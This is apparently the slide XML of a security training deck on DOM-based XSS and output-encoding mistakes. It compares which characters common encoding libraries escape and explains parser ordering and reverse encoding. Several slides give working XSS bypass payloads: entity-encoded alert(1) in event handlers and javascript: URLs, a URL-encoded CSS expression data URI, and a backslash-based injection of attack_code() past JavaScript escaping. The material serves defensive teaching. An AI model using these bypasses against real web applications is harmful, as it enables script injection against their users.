              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[1].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = "alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scripts[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)";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Mitgation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t let users creat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e SCRIPT elements.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 Based XSS 6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Chameleon Context)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window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] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inputVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;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top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] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inputVar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Mitigation:  Don’t let users determine the attribute of objects (left side operations).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Associated with Mitigating XSS Using Output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Characters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Library Used by the Developer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Understanding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Encoding’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Result</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effects of Encoding (Parser Ordering)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoding Fails (CSS)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Characters Encoded by Encoding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86400"/>
          </a:xfrm>
        </p:spPr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bean:write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; and &lt;c:out&gt;  	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, ", &lt;, &gt;, &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>StringEscapeUtils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	2.0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escapeJavascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, ", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> \’, \”, \\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	     but characters between 33 – 127 are left alone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>escapeHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			", &lt;, &gt;, &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpUtility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			", &lt;, &gt;, &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESAPI					All non-alpha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DOM based XSS threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Understand how to mitigate DOM based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Better understand the output encoding misuse cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you need to understand traditional XSS see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet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		&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; or &amp;#999 or &amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xfff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript	\x3c  or \u003c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL		%3c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSS		\3c    or  \(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Parsers ordering can effect escaped values </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>meanings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML Parser Runs first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focused on HTML tags and attributes of those tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only understands HTML escaping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, URL, and CSS parsers run afterwards with stuff given to it by the HTML parser.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Reverse Encoding at Runtime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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML parser will reverse encode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML encoding in event </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>handlers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onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;”  //alert(1)  WORKS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML and URL encoding in URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attributes (after “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:” for URL encoding)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pt-BR" dirty="0" smtClean="0"/>
              <a:t>&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> //alert(1)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WORKS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href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= 			"data:,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2a%7b%78%3a%65%78%70%72%65%73%73%69%6f%6e%28%61%6c%65%72%74%28%32%29%29%7d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"; //DOES WORK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The JavaScript parser will reverse encode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL encoding in URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attributes (after “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:” for URL encoding)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The HTML encoded value attribute of HTML rendered page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>elements retrieved via DOM methods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Fail #1 (Wrong Encoding)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400" dirty="0" smtClean="0"/>
              <a:t>&lt;SCRIPT&gt;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dirty="0" err="1" smtClean="0"/>
              <a:t>dofunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>bean:write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> property="val1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>"/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;c:out property="val2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>"/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>);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&lt;/SCRIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;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&lt;!DOCTYPE html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;HTML&gt;&lt;BODY&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>script&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>bean:write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> property</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=“${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>param.script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>}" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;&lt;/BODY&gt;&lt;/HTML&gt;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Up Arrow Callout 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="2456974"/>
            <a:ext cx="1914307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sz="3200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, ", &lt;, &gt;, &amp;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Up Arrow Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="4876800"/>
            <a:ext cx="1914307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sz="3200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, ", &lt;, &gt;, &amp;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Up Arrow Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4791293" y="2380774"/>
            <a:ext cx="1914307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sz="3200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, ", &lt;, &gt;, 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Encoding Fail #1 (Wrong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoding Exploit)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600" dirty="0" smtClean="0"/>
              <a:t>&lt;SCRIPT&gt;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600" dirty="0" err="1" smtClean="0"/>
              <a:t>dofunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>bean:write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t> property="val1" /&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;c:out property="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>val2”/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> );  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&lt;/SCRIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>&gt;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3900" dirty="0" smtClean="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" smtClean="0"/>
              <a:t>al1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" smtClean="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" smtClean="0"/>
              <a:t>al2 =  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();// </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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&lt;SCRIPT&gt;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3000" dirty="0" err="1" smtClean="0"/>
              <a:t>dofunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>,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/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , 1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0"/>
              <a:t>’);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fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;/SCRIPT&gt;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fr-FR" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Credit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should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be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given</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> to Jeremy Long for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>finding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> the exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>above</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML5 automatically reverse HTML encodes characters in between the &lt;script&gt; tags at runtime.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Encoding Fail #2 (Parser Interaction)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&lt;script&gt;</a:t>
            </a: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x = "&lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>StringEscapeUtils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.escapeJavascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>req.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("input")) %&gt;";</a:t>
            </a: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…</a:t>
            </a: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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400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2400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24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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="#" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr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  &lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>StringEscapeUtils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.escapeJavascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>req.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("input")) %&gt;" &gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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5181600" y="2209800"/>
            <a:ext cx="2741391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dirty="0" smtClean="0"/>
              <a:t>‘, “, \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> \’, \”, \\</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Up Arrow Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="5562600"/>
            <a:ext cx="2741391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dirty="0" smtClean="0"/>
              <a:t>‘, “, \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> \’, \”, \\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Encoding Fail #2 (Parser </a:t>
            </a:r>
            <a:r>
